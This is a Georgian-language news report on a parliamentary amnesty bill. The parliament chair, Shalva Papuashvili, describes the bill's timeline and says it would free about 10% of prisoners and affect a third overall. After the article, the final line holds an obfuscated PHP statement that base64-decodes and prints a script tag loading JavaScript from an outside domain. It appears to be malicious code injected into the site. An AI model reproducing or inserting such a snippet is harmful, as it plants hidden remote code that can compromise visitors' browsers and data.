celsiusi
ავერსი საქკაბელი

ამნისტიის პროექტი 15 ივლისს, პარლამენტის ბიუროს სხდომაზე შემოვა და შემდეგ მისი განხილვა კომიტეტებში გადაინაცვლებს, – ამის შესახებ პარლამენტის თავმჯდომარე შალვა პაპუაშვილმა ბიუროს სხდომაზე განაცხადა.

როგორც შალვა პაპუაშვილმა აღნიშნა, მომდევნო კვირაში, რიგგარეშე სესიის ფარგლებში, კანონპროექტის პირველი მოსმენით მიღებაა დაგეგმილი, ხოლო მისი მესამე მოსმენით მიღება საშემოდგომო სესიის დროს მოხდება.

„მინდა, მადლობა გადავუხადო რატი იონათამიშვილს და ადამიანის უფლებათა დაცვისა და სამოქალაქო ინტეგრაციის კომიტეტს, რომელმაც ეს პროექტი მოამზადა, ასევე საქართველოს მთავრობისა და პროკურატურის წარმომადგენლებს, რომლებთან თანამშრომლობითაც ხდებოდა ამნისტიის პროექტის შემუშავება.

ეს არის საკმაოდ დაბალანსებული ამნისტიის აქტი, რომელიც პირველი ნაბიჯია იქითკენ, რაც პრემიერ-მინისტრმა განაცხადა, შემდეგ წლიური ანგარიშის დროსაც გაიმეორა და რაც ჩვენი პოლიტიკური გუნდის სურვილია, შემცირდეს პენიტენციურ დაწესებულებაში პატიმართა რიცხოვნობა. ჩვენ გარკვეულწილად შიდა მიზანიც დასახული გვაქვს, რომ საბოლოო ჯამში, ერთი მესამედით შემცირდეს პენიტენციურ დაწესებულებაში მყოფი პირების საერთო რაოდენობა.

ეს ამნისტია, დაახლოებით 10%-მდე პატიმარს შეეხება დაუყოვნებლივ გათავისუფლების სახით და საერთო ჯამში, შეეხება პატიმრების ერთ მესამედს სხვადასხვა სახით. ცნობილია, რომ გათვალისწინებულია სხვადასხვა ფორმა – არის დაუყოვნებლივ გათავისუფლება, ვადის განახევრება, ერთ მეოთხედით შემცირება, ერთი მეექვსედით შემცირება. საბოლოო ჯამში, ამნისტია 300-მდე მუხლს ეხება“, – განაცხადა შალვა პაპუაშვილმა.

„ამნისტიის შესახებ“ კანონპროექტი „ქართულმა ოცნებამ“ დაანიცირა.

140
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");